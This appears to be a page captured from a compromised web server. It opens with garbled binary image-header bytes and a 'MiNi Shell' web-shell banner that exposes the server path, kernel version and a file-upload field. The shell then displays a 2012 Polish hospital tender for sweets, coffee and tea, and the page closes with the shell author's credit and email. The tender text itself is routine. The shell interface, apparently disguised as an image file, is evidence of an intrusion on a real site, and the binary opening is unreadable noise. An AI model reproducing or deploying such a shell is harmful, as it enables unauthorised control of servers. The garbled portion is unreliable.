JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120608/192822-N-2012.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa artykułów spożywczych ( uzupełnienie)</b><br>
<b>Numer ogłoszenia: 192822 - 2012; data zamieszczenia: 08.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych ( uzupełnienie).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spozywczych okreslonych w załączniku nr 2 do SIWZ:
 Mieszanka  czekoladowa 2,5kg np.. Wedlowska 	kg	10
Baton Chałwa wanilia 100g	szt	30
Baton Chałwa wanilia 50g	szt	50
Baton czekoladowy a 23,5 g np.. Milky-Way 	szt	70
Baton czekoladowy a 25g np.. Knopers	szt	50
Baton czekoladowy a 40g np.. Kit-Kat 	szt	50
Baton czekoladowy a 42g. Np.. Mars	szt	100
Baton czekoladowy a 43 g np.. Lion	szt	50
Baton czekoladowy a 51 g np.. Twix 	szt	100
Baton czekoladowy a 55g np..  Snikers	szt	100
Baton czekoladowy Ptasie mleczko a 56g 	szt	30
Batonik czekoladowy a 41g np.. 3 Bit 	szt	50
Batonik czekoladowy a 51g np.. 3 Bit XXL 	szt	50
Batonik czekoladowy a 53g np.. Kinder-Bueno 	szt	50
Biszkopty kwadratowe 120g np.. Petitki	szt	50
Biszkopty okrągłe a 100g	szt	150
Biszkopty podłużne 140g	szt	50
Biszkopty z pianką a 128g np.. Milka różne smaki 	szt 	30
Bombonierka   276g np.. Cherry Quenn	szt	20
Bombonierka  150g np..Rafaello	szt	20
Bombonierka  190g np..Złote Róże	szt	20
Bombonierka  200g np.. Baryłki	szt	20
Bombonierka  250g np.. Merci 	szt	20
Bombonierka  254g np.. Elegancja	szt	20
Bombonierka  324g np.. Amaretto	szt	20
Bombonierka  400g np.. Mleczko Alpejskie	szt	20
Bombonierka 500g np.. Michałki Zamkowe 	szt	20
Bombonierka a 210g np.. Malaga 	szt	10
Bombonierka a 268g	szt	20
Bombonierka a 430 g np.. Kasztanki	szt	20
Bombonierka Ptasie Mleczko 450g	szt	20
Chipsy a 30 g np.. Leysy 	szt	100
Chrupki kukurydziane a 100g	szt	100
Ciasteczka herbatniki a 150g np.. Hit	szt	50
Ciastka  100g np..Leibniz Minis	szt	50
Ciastka  maślane 180g	szt	40
Ciastka czekoladowe a 140g np.. Jeżyki 	szt	30
Ciastka czekoladowe a 147g np.. Delicje	szt	200
Ciastka deserowe z cukrem 185g	szt	40
Ciastka Herbatniki  100g np.. Petitki	szt	40
Ciastka herbatniki a 250g np.. Hit	szt	50
Ciastka Kokosowe 148g np.. Łakotki	szt	40
Ciastka kruche a 135g np.. Pieguski 	szt	40
Ciastka Pierniki  a 250g np.. Pierniki alpejskie	szt	50
Ciastka Pierniki  a 250g np.. Pierniki alpejskie	szt	40
Cukierki  100g np..Fruit Tella	szt	40
Cukierki  a 100g np..Hops	szt	30
Cukierki  a 90g np..Fantazje	szt	30
Cukierki  mleczne 150gnp. Krówki	szt	30
Cukierki 100g np.. Kukułki	szt	30
Cukierki draże a 70g	szt	50
Cukierki dropsy a 40g np.. Kopiko 	szt	20
Cukierki landrynki a 100g np.. Brando 	szt	30
Cukierki Landrynki a 150g	szt	50
Cukierki Landrynki a 90g np. Malinki Goplana	szt	30
Cukierki Landryny  90g np.Goplana	szt	30
Cukierki Mentos  38g np..Fruit	szt	30
Cukierki Mentos  38g np..Mint	szt	30
Cukierki miętowe 16g np..Tic-Tac	szt	100
Cukierki miętowe a 90g	szt	50
Cukierki żelki a 75g	szt	20
Czekolada  biała a 100g	szt	50
Czekolada a 100g np. Milka z orzechami 	szt	50
Czekolada a 100g np. Milka z rodzynkami 	szt	50
Czekolada a 100g np.. Milka kremowa 	szt	50
Czekolada a 100g np.. Milka z całymi orzechami 	szt	40
Czekolada a 200g np. Goplana 	szt	40
Czekolada a 250g np.. Milka z orzechami 	szt	40
Czekolada a 250g np. Milka 	szt	40
Czekolada gorzka a 100g	szt	200
Czekolada mleczna a 100g np. Goplana 	szt	40
Czekolada mleczna a 100g np. Milka 	szt	30
Czekolada mleczna a 100g np. Wedel 	szt	30
Czekolada mleczna a 200g	szt	30
Czekolada nadziewana truskawkowa a 100g	szt	20
Czekolada z bakaliami a 100g	szt	40
Czekoladki mleczne a 100g np.. Kinder	szt	40
Galaretka w czekoladzie 2,5kg	kg	10
Guma do żucia a 15g np.. Orbit	op	120
Guma rozpuszczalna a 4 np.. Mamba	szt	30
Herbata  exp. a 20szt x 2g np.. Tetli	op	30
Herbata  granulowana 100g np..Saga	kg	150
Herbata exp.  25szt x 2g np.. Lipton	op	50
Herbata exp.  40 np.. Minutka	szt	400
Herbata exp.  a 100szt np..Lipton	op	20
Herbata exp.  a 20szt np..Saga	op	30
Herbata exp.  a 50szt np.. Saga	op	30
Kawa  parzona a 250g np.. Jacobs Aromat	kg	5
Kawa  parzona a 250gnp. Ford	szt	20
Kawa  rozpuszcalna 3x18g np.. Maxwell	szt	30
Kawa Capucino a 15g	szt	200
Kawa Lavanzza a 250g mielona 	szt	8
Kawa Lavanzza a 250g ziarnista 	szt	192
Kawa parzona   a 100g np.. Tchibo	kg	20
Kawa parzona  a 100g np.. Ford	kg	15
Kawa parzona  a 100g np.. Prima 	kg	20
Kawa parzona  a 100g np.. Z kogutkiem 	kg	30
Kawa parzona  a 250g np.. Prima	kg	30
Kawa parzona  a 250g np.. Tchibo	kg	25
Kawa parzona  a 250g np.. Z kogutkiem	kg	30
Kawa parzona 250g np.. Jakobs Kronung	kg	10
Kawa parzona a 100g np..  Jacobs	kg	15
Kawa parzona a 100g np.. Maxwell	kg	10
Kawa parzona a 250g np.. Maxwell	szt	10
Kawa rozpuszczalna a 100 g np.. Cranata Gold 	szt	20
Kawa rozpuszczalna  3 w 1 (saszetka) np.. Nescafe	szt	50
Kawa rozpuszczalna  50g np.. Nescafe	szt	30
Kawa rozpuszczalna  a 100g np.. Nescafe	szt	30
Kawa rozpuszczalna a 100g np.. Jakobs Aromat 	szt	20
Kawa rozpuszczalna  a 200g np.. Maxwell	szt	20
Kawa rozpuszczalna  a 200g np.. Nescafe	szt	20
Kawa rozpuszczalna a 200g np.. Jakobs Aromat 	szt	20
Kawa rozpuszczalna  a 50g np.. Maxwell	szt	20
Kawa rozpuszczalna a 100g np.. Jakobs Kronung 	szt	20
Kawa rozpuszczalna a 100g np.. Tchibo Familly 	szt	20
Kawa rozpuszczalna a 200 g np.. Cranat Gold 	szt	20
Kawa rozpuszczalna a 200 g np.. Tchibo Familly	szt	20
Kawa rozpuszczalna typu Nescafe Creme 100 g	szt	15
Kawa rozpuszczalna typu Nescafe Creme 200 g	szt	10
Kawa zbożowa 0,5 kg	szt	300
Krakersy a 70g	szt	50
Kwa rozpuszczalna 200g np.. Jakobs Kronung	szt	20
Paluszki a 135g	szt	100
Paluszki  a 70g a Beskidzkie	szt	50
Rodzynki w czekoladzie 80g 	szt	30
Snaki a 28g	szt	50
Suchary a 300g	szt	20
Wafle  a 180g np..Kinder	szt	50
Wafle  a 22g np..WW	szt	50
Wafle  a 36g np.. Princessa	szt	120
Wafle  a 40g np.. Prinsesa	szt	50
Wafle  a 45g np.. WW	szt	50
Wafle a 20g np.. Prince Polo	szt	100
Wafle a 28g np.. Prince Polo 	szt	50
Wafle a 40g np. Prince Polo 	szt	100
Wafle a 50g np.. Horalky różne smaki 	szt	20
Wafle andrutowe a 110g	szt	30
Wafle andrutowe a 180g np.. Familijne 	szt	50
Wafle andrutowe a 28g np.. Grześki	szt	100
Wafle czekoladowe a 20g np.. Elitesse	szt	1200
Wafle czekoladowe a 40g np.. Elitesse	szt	50.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi  osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zezwolenie organu nadzoru sanitarnego na transport żywności określonym środkiem transportu
	Do potwierdzenia odpowiednim dokumentem
Dostawca powinien mieć lub mieć podjęte działania wdrożenia systemu HACCP 
	Do potwierdzenia oświadczeniem</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b)	nastąpila zmiana sposobu konfekcjonowania
c)	wprowadzony zostanie do sprzedaży przez wykonawcę produkt
     zmodyfikowany/ udoskonalony
d)	wystąpił przejściowy brak produktu z przyczyn leżacych po stronie producenta
     przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie
     gorszych od  produktu objętego umową.
    e)  zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym
         przypadku zmianie ulegnie kwota podatku VAT i cena brutto , cena netto
         pozostanie niezmienna, 
    f)   w przypadku zmiany stawki podatku VAT w ramach niniejszej umowy zmiana
         stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę,
g)	zmiana cen producenta do 5% ceny jednostkowej - w tym przypadku wymagana jest pisemna informacja Dostawcy, z odpowiednim wyprzedzeniem, nie później niż 3 dni przed proponowana zmianą oraz zgoda Zamawiającego,
h)	zmiana cen producenta powyżej 10% ceny jednostkowej - w tym przypadku wymagana jest pisemna informacja Dostawcy, z odpowiednim wyprzedzeniem, nie później niż 3 dni przed proponowana zmianą, udokumentowanie jej zmiany przez producenta w postaci zaświadczenia oraz zgoda Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Zespołu Opieki Zdrowotnej
Blok B, Iv piętro, ul. Szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej , Blok C, I piętro, ul. Szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com